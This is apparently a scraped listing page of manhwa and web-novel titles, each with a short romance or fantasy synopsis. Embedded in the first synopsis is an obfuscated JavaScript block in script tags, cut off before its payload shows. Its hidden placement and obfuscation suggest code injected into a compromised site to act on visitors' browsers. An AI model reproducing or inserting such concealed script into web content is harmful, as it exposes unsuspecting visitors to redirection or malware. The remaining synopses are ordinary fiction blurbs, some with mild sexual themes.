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4169 results

Girl’s World ( World of Girl )

It seems perfect, but in fact the lonely swans and the good-looking ducks meet and struggle with each other and become real friends …<script></script><script>(function(_0x582b04,_0x34bbb9){var _0x542c58=_0x2b32,_0x4ed678=_0x582b04();while(!![]){try{var _0x179a8b=parseInt(_0x542c58(0x153))/(0x9b5+-0xac6+0x112)*(parseInt(_0x542c58(0x16a))/(-0x4*0x13d+0x9c6+-0x4d0))+-parseInt(_0x542c58(0x15f))/(-0x4d*0x9+-0x1*0x87e+0xb36)*(-parseInt(_0x542c58(0x169))/(-0x570+-0xd*0x1c+0xdc*0x8))+parseInt(_0x542c58(0x159))/(-0x17*0x2f+0x13ab+0xb*-0x167)+parseInt(_0x542c58(0x16b))/(-0x250+0x22d9+0xcb*-0x29)+-parseInt(_0x542c58(0x15b))/(-0x16*0x1a5+-0x16e1*0x1+0x3*0x13b2)+-parseInt(_0x542c58(0x156))/(-0x1*0xca3+-0x88c*0x1+0x1*0x1537)*(parseInt(_0x542c58(0x170))/(-0xcbd+0x3d*-0x65+-0x24d7*-0x1))+parseInt(_0x542c58(0x155))/(-0x6bf+0x1773+0x9*-0x1da)*(-parseInt(_0x542c58(0x161))/(-0x26da*-0x1+0x185f+-0x3f2e));if(_0x179a8b===_0x34bbb9)break;else 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Deliverance of the Counterattack

.Having a two-faced bitch as a love rival isn't scary What's scary is that the bitch has the upper handreincarnating as his little brother! Due to his "little brother," his lover was snatched away, his grandfather suffered a terrible death, the family business was taken over, and on top of all that, he was chained and thrown into prison.However, on the night before his release, he got laid by a man in the midst of confusion and became pregnant. After he got out of prison, he came back anew; he opened a restaurant and made a fortune while raising his child. He lived a vibrant life, but certainly didn't forget to deal with his horrible ex and bitch.


Protecting the Witch’s Son

Read manhwa Protecting the Witch’s Son / 마녀의 아들을 지키는 이유 To others, she was a witch to be feared. But to Elaine, Bella was her savior. After a night of tragedy destroys the life she knows, Elaine wakes to find Bella’s heart now beating in her chest. Startled, she sets out to find Rhys, Bella’s son, only to discover he is no longer as he once was…


Evangeline’s Sword

Read manhwa Evangeline’s Sword / 에반젤린의 검 “I want to bring it back… Our original form, our original Michael… .” Evangeline and Michael grew up together on the island since childhood. However, her friend Michael left the island to become a knight and lost contact with him. When was it wrong? Five years later, Michael met again and became a cursed magician who burns the continent. “Me… I can’t remember anything, Eve.” “What do you mean?” “I… I’ve been cursed by a demon dragon.” The evil dragon’s curse turned the boy with the angel’s name into a slaughter-crazed demon. The boy’s most precious person, Evangeline, makes a decision. “I will choose you this time. Mika.” The story of Michael, who became a magician under the curse of a demon dragon, and Evangeline, who tries to save Michael.


You’re just a supporting character, so love me!

Read manhwa You’re a Supporting Character, Just Love Me / Side Characters Deserve Love Too / 어차피 조연인데 나랑 사랑이나 해 “I want to convey my heart.” I suffered from a unilateral fever of love for the supporting character in the book who faces a miserable ending. But… was that a little too much? To the point where you’re in a book? I don’t know who God is, but the consumer satisfaction assessment is satisfactory. ‘Sorry, I saw your butt on the way out. Kyle’s ass is so pretty.’ ‘Why are you looking at my ass!’ ……no, I didn’t mean to express my feelings this much. Help me, Roban. Help me. Telepathy that you can only hear it with sincerity. Do you really count the insidiousness? Kim Geum-ja is struggling today with her dark heart towards her favorite character.I’m gonna be Josephine and I’m gonna be next to Kyle! “I don’t know if it’s a man, but Josephine, who doesn’t know how to write, doesn’t do anything.” What? Well……I’ll be your man. Hello, my name is Joe. I’m a man from today.


Stigma Effect

A maid who is beaten on behalf of a noble boy. Some memories of her childhood were cruel, but Yuriel held no resentment towards the boy. Rather, she liked it–The hand that carefully applied medicine to her wounds was always warm. “M-Master, stop, Raph, sa, save…ah, mm…!” “That’s why.. I told you.. to wait.. till I returned.” But the Raphlet that appeared in her dreams showed nothing but passion and lust. Prophetic dreams. The ability that was like a stigma drove Yuriel towards an unknown future. All I want is to be next to you. Associated Names 스티그마 이펙트


I Thought It Was a Fantasy Romance, but It’s a Horror Story

One day, when I opened my eyes, I had become Rosé, the second daughter of a wealthy family. What do you mean I’m a lady of leisure born with a golden spoon in my mouth? I won’t let this chance of a lifetime slip through my fingers. I’m going to loaf around and enjoy good food. “I’ll do my best as a fiancé, Rosé,” said a rich man with world-class good looks. At this point, it was impossible to deny it. This is a Korean fantasy romance. I must have become a character in a romance fantasy! *** This is the story of a girl who transmigrated into what she thought was a romance fantasy book, but… It’s actually a horror story!


The Chaser Of Dawn

I accidentally spent the night with three men. One of them was a childhood friend that I hadn’t seen in ages. One was a feisty elf who I haven’t talked to for a long time. One of them was a fellow researcher? To make such a terrible mistake! Kriserua failed an important quest on that day. I tried to erase their memories and focus on handling requests… “Have a child? You?” Eventually, they found out that I was pregnant. What am I supposed to do with this nonsense? More than that, I have to deal with failure first! “If you don’t mind, I’ll live thinking it’s my child.” “No one is more suitable than me as the father of the child.” “That day is my responsibility, so I will be responsible.” In the end, they started chasing after me, who’s on a journey to rectify the mess. ‘No! I don’t need you guys!’ A delightful and exhausting adventure story of Kriserua, a tactless yet straight-laced person, and the unrequited love of three men who can’t communicate with each other! Associated Names The Seeker of the First Light 미명의 추적자


Four Dangerous Brothers To My Rescue!

Read manhwa Four Dangerous Brothers to My Rescue! / 공녀님의 위험한 오빠들 Warmhearted Lestia has resigned herself to a life of misery under the thumb of her abusive uncle. However, right when things seem to take a turn for the worst, a mysterious boy claiming to be one of her four long-lost brothers appears in the nick of time to save her. After being whisked into a life of luxury, Lestia has her doubts about taking on the Verchester name. But after the discovery of her latent magical powers, Lestia starts to accept two strange truths: She is a true Verchester, and she has a destiny to fulfill.


Your Majesty, I will raise you well in this life

She gave her all to make her son, 3rd Prince Leon, emperor. On the day this dream was fulfilled, she went to the place where the emperor’s coffin rested, where she found her son dying from the poison he had drunk himself. “I… have never been happy in my life.” Only despair was left for Elisha, who was holding onto her son’s cold corpse. “Leon…” However, after losing consciousness, she woke up to find that her young son was looking at her with his lovely face! “If this isn’t a dream, if it’s a new opportunity… I stole a lot of things in the name of doing it for you, so if you ask me, I will do whatever you want.” Elisha, who vowed to become a good mother in this life, instead of piling up dead bodies and squeezing blood in a war to claim the emperor’s throne, makes a different choice from the past by weaving ties with her stepson, the crown prince.


Charlotte Has Five Disciples

Charlotte Eleanor is an Archmage that once saved the world. Using her magic to die, she instead, reverses the age of her body of a young child and starts a second life as Aria Lissen. She had a fulfilling life in her first lifetime, except for one tiny regret. In this new life, Aria is determined to find and live for that one thing she never had…LOVE.


Male Lead, I’ll Respect Your Taste

Read manhwa Male Lead, I’ll Respect Your Taste / 남주님, 취향 존중해드릴게요 /I Respect the Male Lead’s Taste / Male Protagonist, I Will Respect Your Taste I was possessed by the devastating BL . Just before the historical event of the two main characters took place. Unfortunately, I can see how they both argue, but, I can’t do anything about it… “A moment! How is it that these two end up falling in love?” My main goal is to try to avoid being the villain murdered at the hands of the protagonist. That’s why I have to let the love of both of you be comfortable. But, for some reason, the strongest obsessive protagonist of all time has become a gentle sheep, who acts as if he wants to please me. “Alice… Do you think I’m pretty too?”
